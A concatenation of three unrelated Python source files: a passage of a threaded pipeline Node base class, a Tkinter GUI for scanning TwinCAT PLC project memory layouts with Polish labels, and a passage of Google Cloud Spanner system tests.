max_fps (int): Maximum FPS of the node. This is to avoid the node
running unrestrictedly and causing large resource consuming.
Default: 30
input_check_interval (float): Minimum interval (in millisecond) between
checking if input is ready. Default: 0.001
enable (bool): Default enable/disable status. Default: True.
daemon (bool): Whether node is a daemon. Default: True.
"""
def __init__(self,
name: Optional[str] = None,
enable_key: Optional[Union[str, int]] = None,
max_fps: int = 30,
input_check_interval: float = 0.01,
enable: bool = True,
daemon=False):
super().__init__(name=name, daemon=daemon)
self._runner = None
self._enabled = enable
self.enable_key = enable_key
self.max_fps = max_fps
self.input_check_interval = input_check_interval
# A partitioned buffer manager the runner's buffer manager that
# only accesses the buffers related to the node
self._buffer_manager = None
# Input/output buffers are a list of registered buffers' information
self._input_buffers = []
self._output_buffers = []
# Event manager is a copy of assigned runner's event manager
self._event_manager = None
# A list of registered event information
# See register_event() for more information
# Note that we recommend to handle events in nodes by registering
# handlers, but one can still access the raw event by _event_manager
self._registered_events = []
# A list of (listener_threads, event_info)
# See set_runner() for more information
self._event_listener_threads = []
# A timer to calculate node FPS
self._timer = StopWatch(window=10)
# Register enable toggle key
if self.enable_key:
# If the node allows toggling enable, it should override the
# `bypass` method to define the node behavior when disabled.
if not is_method_overridden('bypass', Node, self.__class__):
raise NotImplementedError(
f'The node {self.__class__} does not support toggling'
'enable but got argument `enable_key`. To support toggling'
'enable, please override the `bypass` method of the node.')
self.register_event(
event_name=self.enable_key,
is_keyboard=True,
handler_func=self._toggle_enable,
)
@property
def registered_buffers(self):
return self._input_buffers + self._output_buffers
@property
def registered_events(self):
return self._registered_events.copy()
def _toggle_enable(self):
self._enabled = not self._enabled
def register_input_buffer(self,
buffer_name: str,
input_name: str,
trigger: bool = False):
"""Register an input buffer, so that Node can automatically check if
data is ready, fetch data from the buffers and format the inputs to
feed into `process` method.
This method can be invoked multiple times to register multiple input
buffers.
The subclass of Node should invoke `register_input_buffer` in its
`__init__` method.
Args:
buffer_name (str): The name of the buffer
input_name (str): The name of the fetched message from the
corresponding buffer
trigger (bool): An trigger input means the node will wait
until the input is ready before processing. Otherwise, an
inessential input will not block the processing, instead
a None will be fetched if the buffer is not ready.
"""
buffer_info = BufferInfo(buffer_name, input_name, trigger)
self._input_buffers.append(buffer_info)
def register_output_buffer(self, buffer_name: Union[str, List[str]]):
"""Register one or multiple output buffers, so that the Node can
automatically send the output of the `process` method to these buffers.
The subclass of Node should invoke `register_output_buffer` in its
`__init__` method.
Args:
buffer_name (str|list): The name(s) of the output buffer(s).
"""
if not isinstance(buffer_name, list):
buffer_name = [buffer_name]
for name in buffer_name:
buffer_info = BufferInfo(name)
self._output_buffers.append(buffer_info)
def register_event(self,
event_name: str,
is_keyboard: bool = False,
handler_func: Optional[Callable] = None):
"""Register an event. All events used in the node need to be registered
in __init__(). If a callable handler is given, a thread will be create
to listen and handle the event when the node starts.
Args:
Args:
event_name (str|int): The event name. If is_keyboard==True,
event_name should be a str (as char) or an int (as ascii)
is_keyboard (bool): Indicate whether it is an keyboard
event. If True, the argument event_name will be regarded as a
key indicator.
handler_func (callable, optional): The event handler function,
which should be a collable object with no arguments or
return values. Default: None.
"""
event_info = EventInfo(event_name, is_keyboard, handler_func)
self._registered_events.append(event_info)
def set_runner(self, runner):
# Get partitioned buffer manager
buffer_names = [
buffer.buffer_name
for buffer in self._input_buffers + self._output_buffers
]
self._buffer_manager = runner.buffer_manager.get_sub_manager(
buffer_names)
# Get event manager
self._event_manager = runner.event_manager
def _get_input_from_buffer(self) -> Tuple[bool, Optional[Dict]]:
"""Get and pack input data if it's ready. The function returns a tuple
of a status flag and a packed data dictionary. If input_buffer is
ready, the status flag will be True, and the packed data is a dict
whose items are buffer names and corresponding messages (unready
additional buffers will give a `None`). Otherwise, the status flag is
False and the packed data is None.
Returns:
bool: status flag
dict[str, Message]: the packed inputs where the key is the buffer
name and the value is the Message got from the corresponding
buffer.
"""
buffer_manager = self._buffer_manager
if buffer_manager is None:
raise ValueError(f'{self.name}: Runner not set!')
# Check that trigger buffers are ready
for buffer_info in self._input_buffers:
if buffer_info.trigger and buffer_manager.is_empty(
buffer_info.buffer_name):
return False, None
# Default input
result = {
buffer_info.input_name: None
for buffer_info in self._input_buffers
}
for buffer_info in self._input_buffers:
try:
result[buffer_info.input_name] = buffer_manager.get(
buffer_info.buffer_name, block=False)
except Empty:
if buffer_info.trigger:
# Return unsuccessful flag if any
# trigger input is unready
return False, None
return True, result
def _send_output_to_buffers(self, output_msg):
"""Send output of the process method to registered output buffers.
Args:
output_msg (Message): output message
force (bool, optional): If True, block until the output message
has been put into all output buffers. Default: False
"""
for buffer_info in self._output_buffers:
buffer_name = buffer_info.buffer_name
self._buffer_manager.put_force(buffer_name, output_msg)
@abstractmethod
def process(self, input_msgs: Dict[str, Message]) -> Union[Message, None]:
"""The core method that implement the function of the node. This method
will be invoked when the node is enabled and the input data is ready.
All subclasses of Node should override this method.
Args:
input_msgs (dict): The input data collected from the buffers. For
each item, the key is the `input_name` of the registered input
buffer, while the value is a Message instance fetched from the
buffer (or None if the buffer is unessential and not ready).
Returns:
Message: The output message of the node. It will be send to all
registered output buffers.
"""
def bypass(self, input_msgs: Dict[str, Message]) -> Union[Message, None]:
"""The method that defines the node behavior when disabled. Note that
if the node has an `enable_key`, this method should be override.
The method input/output is same as it of `process` method.
Args:
input_msgs (dict): The input data collected from the buffers. For
each item, the key is the `input_name` of the registered input
buffer, while the value is a Message instance fetched from the
buffer (or None if the buffer is unessential and not ready).
Returns:
Message: The output message of the node. It will be send to all
registered output buffers.
"""
raise NotImplementedError
def _get_node_info(self):
"""Get route information of the node."""
info = {'fps': self._timer.report('_FPS_'), 'timestamp': time.time()}
return info
def on_exit(self):
"""This method will be invoked on event `_exit_`.
Subclasses should override this method to specifying the exiting
behavior.
"""
def run(self):
"""Method representing the Node's activity.
This method override the standard run() method of Thread. Users should
not override this method in subclasses.
"""
logging.info(f'Node {self.name} starts')
# Create event listener threads
for event_info in self._registered_events:
if event_info.handler_func is None:
continue
def event_listener():
while True:
with self._event_manager.wait_and_handle(
event_info.event_name, event_info.is_keyboard):
event_info.handler_func()
t_listener = Thread(target=event_listener, args=(), daemon=True)
t_listener.start()
self._event_listener_threads.append(t_listener)
# Loop
while True:
# Exit
if self._event_manager.is_set('_exit_'):
self.on_exit()
break
# Check if input is ready
input_status, input_msgs = self._get_input_from_buffer()
# Input is not ready
if not input_status:
time.sleep(self.input_check_interval)
continue
# If a VideoEndingMessage is received, broadcast the signal
# without invoking process() or bypass()
video_ending = False
for _, msg in input_msgs.items():
if isinstance(msg, VideoEndingMessage):
self._send_output_to_buffers(msg)
video_ending = True
break
if video_ending:
self.on_exit()
break
# Check if enabled
if not self._enabled:
# Override bypass method to define node behavior when disabled
output_msg = self.bypass(input_msgs)
else:
with self._timer.timeit():
with limit_max_fps(self.max_fps):
# Process
output_msg = self.process(input_msgs)
if output_msg:
# Update route information
node_info = self._get_node_info()
output_msg.update_route_info(node=self, info=node_info)
# Send output message
if output_msg is not None:
self._send_output_to_buffers(output_msg)
logging.info(f'{self.name}: process ending.')
class MultiInputNode(Node):
"""Base interface of functional module which accept multiple inputs."""
def _get_input_from_buffer(self) -> Tuple[bool, Optional[Dict]]:
"""Get and pack input data if it's ready. The function returns a tuple
of a status flag and a packed data dictionary. If input_buffer is
ready, the status flag will be True, and the packed data is a dict
whose items are buffer names and corresponding messages (unready
additional buffers will give a `None`). Otherwise, the status flag is
False and the packed data is None. Notice that.
Returns:
bool: status flag
dict[str, list[Message]]: the packed inputs where the key
is the buffer name and the value is the Message got from the
corresponding buffer.
"""
buffer_manager = self._buffer_manager
if buffer_manager is None:
raise ValueError(f'{self.name}: Runner not set!')
# Check that essential buffers are ready
for buffer_info in self._input_buffers:
if buffer_info.trigger and buffer_manager.is_empty(
buffer_info.buffer_name):
return False, None
# Default input
result = {
buffer_info.input_name: None
for buffer_info in self._input_buffers
}
for buffer_info in self._input_buffers:
while not buffer_manager.is_empty(buffer_info.buffer_name):
if result[buffer_info.input_name] is None:
result[buffer_info.input_name] = []
result[buffer_info.input_name].append(
buffer_manager.get(buffer_info.buffer_name, block=False))
if buffer_info.trigger and result[buffer_info.input_name] is None:
return False, None
return True, result
|
twincatscannergui.py
|
import tkinter as tk
from tkinter import ttk
from tkinter import filedialog
from tkinter import messagebox
import threading
import twincatscanner
class Application(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.grid(row=0, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(3, weight=1)
self.create_widgets()
def create_widgets(self):
self.buttons = ttk.Frame(self)
self.buttons.grid(row=0, column=0, sticky=tk.NSEW)
self.buttons.columnconfigure(6, weight=1)
self.buttons.rowconfigure(1, weight=1)
self.dir_select = ttk.Button(self.buttons, text="Wybierz projekt", command=self.dir_select_command)
self.dir_select.grid(row=0, column=0, sticky=tk.NSEW)
self.dir = tk.StringVar()
self.dir_path = ttk.Entry(self, textvariable=self.dir)
self.dir_path.grid(row=1, column=0, sticky=tk.NSEW)
self.dir_process = ttk.Button(self.buttons, text="Skanuj projekt", command=self.dir_process_command_async)
self.dir_process.grid(row=0, column=1, sticky=tk.NSEW)
self.export = ttk.Button(self.buttons, text="Zapisz projekt", command=self.csv_command)
self.export.grid(row=0, column=3, sticky=tk.NSEW)
self.select_type = ttk.Button(self.buttons, text="Typ", command=self.type_command, state='disabled')
self.select_type.grid(row=0, column=4, sticky=tk.NSEW)
self.select_mem_map = ttk.Button(self.buttons, text="Pamięć", command=self.mem_map_command, state='disabled')
self.select_mem_map.grid(row=0, column=5, sticky=tk.NSEW)
self.quit = ttk.Button(self, text="Wyjście", command=ROOT.destroy)
self.quit.grid(row=0, column=1, rowspan=2, sticky=tk.NSEW)
self.main_area = ttk.Notebook(self)
self.main_area.grid(row=3, column=0, columnspan=2, sticky=tk.NSEW)
self.tab_names = {0 : "Zmienne", 1 : "Stałe", 2 : "Typy", 3 : "Pamięć"}
self.memory_areas_list = self.create_tab(self.main_area, self.tab_names[0], ("name", "offset", "size", "type", "overlap count"))
self.memory_areas_list.column('#0', stretch=tk.NO)
self.memory_areas_list.column('#1', stretch=tk.NO, anchor=tk.CENTER)
self.memory_areas_list.column('#2', stretch=tk.NO, anchor=tk.CENTER)
self.memory_areas_list.column('#3', stretch=tk.NO, anchor=tk.CENTER)
self.memory_areas_list.column('#4', stretch=tk.NO, anchor=tk.CENTER)
self.memory_areas_list.bind('<<TreeviewSelect>>', self.memory_areas_select_command)
self.memory_areas_items = []
self.const_list = self.create_tab(self.main_area, self.tab_names[1], ("name", "value"))
self.const_list.column('#0', stretch=tk.NO)
self.const_list.column('#1', stretch=tk.NO, anchor=tk.CENTER)
self.const_items = []
self.types_list = self.create_tab(self.main_area, self.tab_names[2], ("name", "size"))
self.types_list.column('#0', stretch=tk.NO)
self.types_list.column('#1', stretch=tk.NO, anchor=tk.CENTER)
self.types_items = []
self.mem_list = self.create_tab(self.main_area, self.tab_names[3], ("adr", "variables"))
self.mem_list.column('#0', stretch=tk.NO, anchor=tk.CENTER)
self.mem_list.column('#1', stretch=tk.NO)
self.mem_items = []
self.filter_var = tk.StringVar()
self.filter_var.trace_add("write", self.filter_callback)
self.filter_entry = ttk.Entry(self, textvariable=self.filter_var)
self.filter_entry.grid(row=4, column=0, sticky=tk.NSEW)
self.clear_filter = ttk.Button(self, text="Wyczyść filtr", command=self.clear_filter_command)
self.clear_filter.grid(row=4, column=1, sticky=tk.NSEW)
self.status = tk.StringVar()
self.status_label = ttk.Label(self, textvariable=self.status)
self.status_label.grid(row=5, column=0, columnspan=2, sticky=tk.NSEW)
def create_tab(self, master, text, columns):
tab = ttk.Frame(master)
tab.pack(expand=True, fill=tk.BOTH)
tab.rowconfigure(0, weight=1)
tab.columnconfigure(0, weight=1)
master.add(tab, text=text)
tree = ttk.Treeview(tab, columns=columns)
tab_ysb = ttk.Scrollbar(tab, orient=tk.VERTICAL, command=tree.yview)
tab_xsb = ttk.Scrollbar(tab, orient=tk.HORIZONTAL, command=tree.xview)
tree['yscroll'] = tab_ysb.set
tree['xscroll'] = tab_xsb.set
size = range(len(columns))
for i in size:
tree.heading("#{}".format(str(i)), text=columns[i])
tree.grid(row=0, column=0, sticky=tk.NSEW)
tab_ysb.grid(row=0, column=1, sticky=tk.NS)
tab_xsb.grid(row=1, column=0, sticky=tk.EW)
return tree
def dir_select_command(self):
tmp_dir = filedialog.askdirectory()
self.dir.set(tmp_dir)
def memory_areas_select_command(self, _):
state = 'normal' if self.memory_areas_list.selection() else 'disabled'
self.select_type['state'] = state
self.select_mem_map['state'] = state
def dir_process_command(self):
scanner = twincatscanner.TwinCatScanner()
scanner.notify = self.app_notify
path = self.dir_path.get()
memory_areas, constants, types, memory_map = scanner.run(path)
self.load(memory_areas, types, constants, memory_map)
self.memory_areas_select_command(None)
def dir_process_command_async(self):
thr = threading.Thread(target=self.dir_process_command)
thr.daemon = True
thr.start()
def load(self, memory_areas, types, constants, memory_map):
self.app_notify("ładowanie")
self.load_memory_areas(memory_areas)
self.load_constants(constants)
self.load_types(types)
self.load_memory_map(memory_map)
self.app_notify("")
self.refresh_async()
def refresh(self):
self.app_notify("odświeżanie")
text_filter = self.filter_var.get().upper()
self.refresh_list(self.memory_areas_list, self.memory_areas_items, text_filter=text_filter)
self.refresh_list(self.const_list, self.const_items, text_filter=text_filter)
self.refresh_list(self.types_list, self.types_items, text_filter=text_filter)
self.refresh_list(self.mem_list, self.mem_items, text_filter=text_filter)
self.app_notify("")
def refresh_async(self):
thr = threading.Thread(target=self.refresh)
thr.daemon = True
thr.start()
def refresh_list(self, treeview, items, text_filter=""):
treeview.delete(*treeview.get_children())
for item in items:
if not treeview.exists(item[1]) and self.filter_item(item, text_filter):
self.insert_item(item, treeview, items)
def filter_item(self, item, text_filter):
if not text_filter or text_filter in item[1].upper():
return True
for val in item[2]:
if text_filter in str(val).upper():
return True
return False
def insert_item(self, item, treeview, items):
if item[0] and not treeview.exists(item[0]):
for parent in items:
if parent[1] == item[0]:
self.insert_item(parent, treeview, items)
treeview.insert(item[0], 'end', item[1], text=item[1], values=item[2])
def load_memory_areas(self, memory_areas):
self.memory_areas_items.clear()
for area in memory_areas:
count = len(list(filter(lambda x, y=area: self.memory_area_overlap(x, y), memory_areas))) - 1
values = [str(area['offset']), area['size'], area['type_name'], str(count)]
self.memory_areas_items.append(('', area['var_name'], values))
def memory_area_overlap(self, area1, area2):
if area1['size'] and area2['size']:
r1 = range(area1['offset'], area1['offset'] + area1['size'])
r2 = range(area2['offset'], area2['offset'] + area2['size'])
return not ((r1[-1]<r2[0]) or (r2[-1]<r1[0]))
else:
return False
def load_constants(self, constants):
self.const_items.clear()
for const_name in constants:
const_values = [str(constants[const_name])]
self.const_items.append(('', const_name, const_values))
def load_types(self, types):
self.types_items.clear()
for type_name in types:
type_values = [str(types[type_name]['size'])]
self.types_items.append(('', type_name, type_values))
for field in types[type_name]['fields']:
field_text = "{}.{}".format(type_name, field)
field_values = [str(types[type_name]['fields'][field])]
self.types_items.append((type_name, field_text, field_values))
def load_memory_map(self, memory_map):
self.mem_items.clear()
for mem in memory_map:
mem_values = [memory_map[mem]]
self.mem_items.append(('', str(mem), mem_values))
def app_notify(self, notification):
self.status.set(notification)
def csv_command(self):
import os
path = self.dir_path.get()
checked = path if path else "ProgressTwinCatScan"
basedir = os.path.normpath(checked)
basename = os.path.basename(basedir)
selected = self.main_area.index(self.main_area.select())
filename = "{}_{}".format(basename, self.tab_names[selected])
csv = tk.filedialog.asksaveasfile(filetypes=[("csv files", "*.csv")], initialfile=filename, defaultextension=".csv")
if csv is not None:
if selected == 0:
self.csv_write(csv, self.memory_areas_list, self.csv_memory_areas)
elif selected == 1:
self.csv_write(csv, self.const_list, self.csv_other)
elif selected == 2:
self.csv_write(csv, self.types_list, self.csv_other, subitems=True)
elif selected == 3:
self.csv_write(csv, self.mem_list, self.csv_other)
messagebox.showinfo("ProgressTwinCatScanner", "Zapisano plik")
csv.close()
def csv_write(self, csv, treeview, csv_format, subitems=False, item=None):
childen = treeview.get_children(item)
for child in childen:
item = treeview.item(child)
csv.write(csv_format(item))
if subitems:
self.csv_write(csv, treeview, csv_format, subitems=True, item=child)
def csv_memory_areas(self, item):
return "{};{};{};\n".format(item['text'], item['values'][0], item['values'][2])
def csv_other(self, item):
return "{};{};\n".format(item['text'], item['values'][0])
def type_command(self):
self.jump(self.types_list, 2, 2)
def mem_map_command(self):
self.jump(self.mem_list, 3, 0)
def jump(self, treeview, treeview_index, value_index):
selection = self.memory_areas_list.selection()
if selection is not None:
selected_item = self.memory_areas_list.item(selection)
selected_value = selected_item['values'][value_index]
if treeview.exists(selected_value):
self.main_area.select(treeview_index)
treeview.selection_set(selected_value)
value_index = treeview.index(treeview.selection())
value_count = len(treeview.get_children())
if value_count > 0:
treeview.yview_moveto(value_index/value_count)
def clear_filter_command(self):
self.filter_var.set("")
def filter_callback(self, a, b, c):
self.refresh()
ROOT = tk.Tk()
ROOT.title("ProgressTwinCatScanner")
ROOT.rowconfigure(0, weight=1)
ROOT.columnconfigure(0, weight=1)
ROOT.style = ttk.Style()
ROOT.style.theme_use("alt")
ROOT.style.configure('.', font=('courier', 10))
ROOT.style.configure('TFrame', foreground="white", background="navy")
ROOT.style.configure('TEntry', foreground="white", fieldbackground="brown4", font=('fixedsys', 10))
ROOT.style.configure('TButton', foreground="white", background="aquamarine4")
ROOT.style.configure('TMenubutton', foreground="white", background="aquamarine4")
ROOT.style.configure('TNotebook', foreground="white", background="navy")
ROOT.style.configure('Treeview', foreground="white", background="navy", fieldbackground="navy")
ROOT.style.configure('TLabel', foreground="white", background="black")
ROOT.style.configure("Vertical.TScrollbar", troughcolor="medium orchid")
ROOT.style.configure("Horizontal.TScrollbar", troughcolor="medium orchid")
APP = Application(master=ROOT)
APP.mainloop()
|
test_system.py
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import super
from builtins import range
from builtins import zip
from builtins import map
from builtins import str
from builtins import dict
from builtins import int
from future import standard_library
standard_library.install_aliases()
# Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import datetime
import decimal
import math
import operator
import os
import struct
import threading
import time
import unittest
import uuid
import grpc
from google.rpc import code_pb2
from google.api_core import exceptions
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
from google.cloud.spanner_v1 import param_types
from google.cloud.spanner_v1 import TypeCode
from google.cloud.spanner_v1 import Type
from google.cloud._helpers import UTC
from google.cloud.spanner_v1 import BurstyPool
from google.cloud.spanner_v1 import COMMIT_TIMESTAMP
from google.cloud.spanner_v1 import Client
from google.cloud.spanner_v1 import KeyRange
from google.cloud.spanner_v1 import KeySet
from google.cloud.spanner_v1.instance import Backup
from google.cloud.spanner_v1.instance import Instance
from test_utils.retry import RetryErrors
from test_utils.retry import RetryInstanceState
from test_utils.retry import RetryResult
from test_utils.system import unique_resource_id
from tests._fixtures import DDL_STATEMENTS
from tests._fixtures import EMULATOR_DDL_STATEMENTS
from tests._helpers import OpenTelemetryBase, HAS_OPENTELEMETRY_INSTALLED
CREATE_INSTANCE = os.getenv("GOOGLE_CLOUD_TESTS_CREATE_SPANNER_INSTANCE") is not None
USE_EMULATOR = os.getenv("SPANNER_EMULATOR_HOST") is not None
SKIP_BACKUP_TESTS = os.getenv("SKIP_BACKUP_TESTS") is not None
if CREATE_INSTANCE:
INSTANCE_ID = "google-cloud" + unique_resource_id("-")
else:
INSTANCE_ID = os.environ.get(
"GOOGLE_CLOUD_TESTS_SPANNER_INSTANCE", "google-cloud-python-systest"
)
EXISTING_INSTANCES = []
COUNTERS_TABLE = "counters"
COUNTERS_COLUMNS = ("name", "value")
BASE_ATTRIBUTES = {
"db.type": "spanner",
"db.url": "spanner.googleapis.com",
"net.host.name": "spanner.googleapis.com",
}
_STATUS_CODE_TO_GRPC_STATUS_CODE = {
member.value[0]: member for member in grpc.StatusCode
}
class Config(object):
"""Run-time configuration to be modified at set-up.
This is a mutable stand-in to allow test set-up to modify
global state.
"""
CLIENT = None
INSTANCE_CONFIG = None
INSTANCE = None
def _has_all_ddl(database):
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
return len(database.ddl_statements) == len(ddl_statements)
def _list_instances():
return list(Config.CLIENT.list_instances())
def setUpModule():
if USE_EMULATOR:
from google.auth.credentials import AnonymousCredentials
emulator_project = os.getenv("GCLOUD_PROJECT", "emulator-test-project")
Config.CLIENT = Client(
project=emulator_project, credentials=AnonymousCredentials()
)
else:
Config.CLIENT = Client()
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
instances = retry(_list_instances)()
EXISTING_INSTANCES[:] = instances
# Delete test instances that are older than an hour.
cutoff = int(time.time()) - 1 * 60 * 60
instance_pbs = Config.CLIENT.list_instances("labels.python-spanner-systests:true")
for instance_pb in instance_pbs:
instance = Instance.from_pb(instance_pb, Config.CLIENT)
if "created" not in instance.labels:
continue
create_time = int(instance.labels["created"])
if create_time > cutoff:
continue
# Instance cannot be deleted while backups exist.
for backup_pb in instance.list_backups():
backup = Backup.from_pb(backup_pb, instance)
backup.delete()
instance.delete()
if CREATE_INSTANCE:
if not USE_EMULATOR:
# Defend against back-end returning configs for regions we aren't
# actually allowed to use.
configs = [config for config in configs if "-us-" in config.name]
if not configs:
raise ValueError("List instance configs failed in module set up.")
Config.INSTANCE_CONFIG = configs[0]
config_name = configs[0].name
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
Config.INSTANCE = Config.CLIENT.instance(
INSTANCE_ID, config_name, labels=labels
)
created_op = Config.INSTANCE.create()
created_op.result(30) # block until completion
else:
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID)
Config.INSTANCE.reload()
def tearDownModule():
if CREATE_INSTANCE:
Config.INSTANCE.delete()
class TestInstanceAdminAPI(unittest.TestCase):
def setUp(self):
self.instances_to_delete = []
def tearDown(self):
for instance in self.instances_to_delete:
instance.delete()
@unittest.skipIf(
CREATE_INSTANCE, "This test fails when system tests are run in parallel."
)
def test_list_instances(self):
instances = list(Config.CLIENT.list_instances())
# We have added one new instance in `setUpModule`.
if CREATE_INSTANCE:
self.assertEqual(len(instances), len(EXISTING_INSTANCES) + 1)
for instance in instances:
instance_existence = (
instance in EXISTING_INSTANCES or instance == Config.INSTANCE
)
self.assertTrue(instance_existence)
def test_reload_instance(self):
# Use same arguments as Config.INSTANCE (created in `setUpModule`)
# so we can use reload() on a fresh instance.
instance = Config.CLIENT.instance(INSTANCE_ID)
# Make sure metadata unset before reloading.
instance.display_name = None
def _expected_display_name(instance):
return instance.display_name == Config.INSTANCE.display_name
retry = RetryInstanceState(_expected_display_name)
retry(instance.reload)()
self.assertEqual(instance.display_name, Config.INSTANCE.display_name)
@unittest.skipUnless(CREATE_INSTANCE, "Skipping instance creation")
def test_create_instance(self):
ALT_INSTANCE_ID = "new" + unique_resource_id("-")
instance = Config.CLIENT.instance(ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
operation = instance.create()
# Make sure this instance gets deleted after the test case.
self.instances_to_delete.append(instance)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new instance instance and make sure it is the same.
instance_alt = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name
)
instance_alt.reload()
self.assertEqual(instance, instance_alt)
self.assertEqual(instance.display_name, instance_alt.display_name)
@unittest.skipIf(USE_EMULATOR, "Skipping updating instance")
def test_update_instance(self):
OLD_DISPLAY_NAME = Config.INSTANCE.display_name
NEW_DISPLAY_NAME = "Foo Bar Baz"
Config.INSTANCE.display_name = NEW_DISPLAY_NAME
operation = Config.INSTANCE.update()
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new instance instance and reload it.
instance_alt = Config.CLIENT.instance(INSTANCE_ID, None)
self.assertNotEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
instance_alt.reload()
self.assertEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
# Make sure to put the instance back the way it was for the
# other test cases.
Config.INSTANCE.display_name = OLD_DISPLAY_NAME
Config.INSTANCE.update()
class _TestData(object):
TABLE = "contacts"
COLUMNS = ("contact_id", "first_name", "last_name", "email")
ROW_DATA = (
(1, u"Phred", u"Phlyntstone", u"phred@example.com"),
(2, u"Bharney", u"Rhubble", u"bharney@example.com"),
(3, u"Wylma", u"Phlyntstone", u"wylma@example.com"),
)
ALL = KeySet(all_=True)
SQL = "SELECT * FROM contacts ORDER BY contact_id"
_recurse_into_lists = True
def _assert_timestamp(self, value, nano_value):
self.assertIsInstance(value, datetime.datetime)
self.assertIsNone(value.tzinfo)
self.assertIs(nano_value.tzinfo, UTC)
self.assertEqual(value.year, nano_value.year)
self.assertEqual(value.month, nano_value.month)
self.assertEqual(value.day, nano_value.day)
self.assertEqual(value.hour, nano_value.hour)
self.assertEqual(value.minute, nano_value.minute)
self.assertEqual(value.second, nano_value.second)
self.assertEqual(value.microsecond, nano_value.microsecond)
if isinstance(value, DatetimeWithNanoseconds):
self.assertEqual(value.nanosecond, nano_value.nanosecond)
else:
self.assertEqual(value.microsecond * 1000, nano_value.nanosecond)
def _check_rows_data(self, rows_data, expected=None):
if expected is None:
expected = self.ROW_DATA
self.assertEqual(len(rows_data), len(expected))
for row, expected in zip(rows_data, expected):
self._check_row_data(row, expected)
def _check_row_data(self, row_data, expected):
self.assertEqual(len(row_data), len(expected))
for found_cell, expected_cell in zip(row_data, expected):
self._check_cell_data(found_cell, expected_cell)
def _check_cell_data(self, found_cell, expected_cell):
if isinstance(found_cell, DatetimeWithNanoseconds):
self._assert_timestamp(expected_cell, found_cell)
elif isinstance(found_cell, float) and math.isnan(found_cell):
self.assertTrue(math.isnan(expected_cell))
elif isinstance(found_cell, list) and self._recurse_into_lists:
self.assertEqual(len(found_cell), len(expected_cell))
for found_item, expected_item in zip(found_cell, expected_cell):
self._check_cell_data(found_item, expected_item)
else:
self.assertEqual(found_cell, expected_cell)
class TestDatabaseAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.drop()
def test_list_databases(self):
# Since `Config.INSTANCE` is newly created in `setUpModule`, the
# database created in `setUpClass` here will be the only one.
database_names = [
database.name for database in Config.INSTANCE.list_databases()
]
self.assertTrue(self._db.name in database_names)
def test_create_database(self):
pool = BurstyPool(labels={"testcase": "create_database"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
database_ids = [database.name for database in Config.INSTANCE.list_databases()]
self.assertIn(temp_db.name, database_ids)
def test_table_not_found(self):
temp_db_id = "temp_db" + unique_resource_id("_")
correct_table = "MyTable"
incorrect_table = "NotMyTable"
self.assertNotEqual(correct_table, incorrect_table)
create_table = (
"CREATE TABLE {} (\n"
" Id STRING(36) NOT NULL,\n"
" Field1 STRING(36) NOT NULL\n"
") PRIMARY KEY (Id)"
).format(correct_table)
index = "CREATE INDEX IDX ON {} (Field1)".format(incorrect_table)
temp_db = Config.INSTANCE.database(
temp_db_id, ddl_statements=[create_table, index]
)
self.to_delete.append(temp_db)
with self.assertRaises(exceptions.NotFound):
temp_db.create()
@unittest.skip(
(
"update_dataset_ddl() has a flaky timeout"
"https://github.com/GoogleCloudPlatform/google-cloud-python/issues/"
"5629"
)
)
def test_update_database_ddl_with_operation_id(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
# random but shortish always start with letter
operation_id = "a" + str(uuid.uuid4())[:8]
operation = temp_db.update_ddl(ddl_statements, operation_id=operation_id)
self.assertEqual(operation_id, operation.operation.name.split("/")[-1])
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
def test_db_batch_insert_then_db_snapshot_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
from_snap = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(from_snap)
def test_db_run_in_transaction_then_snapshot_execute_sql(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
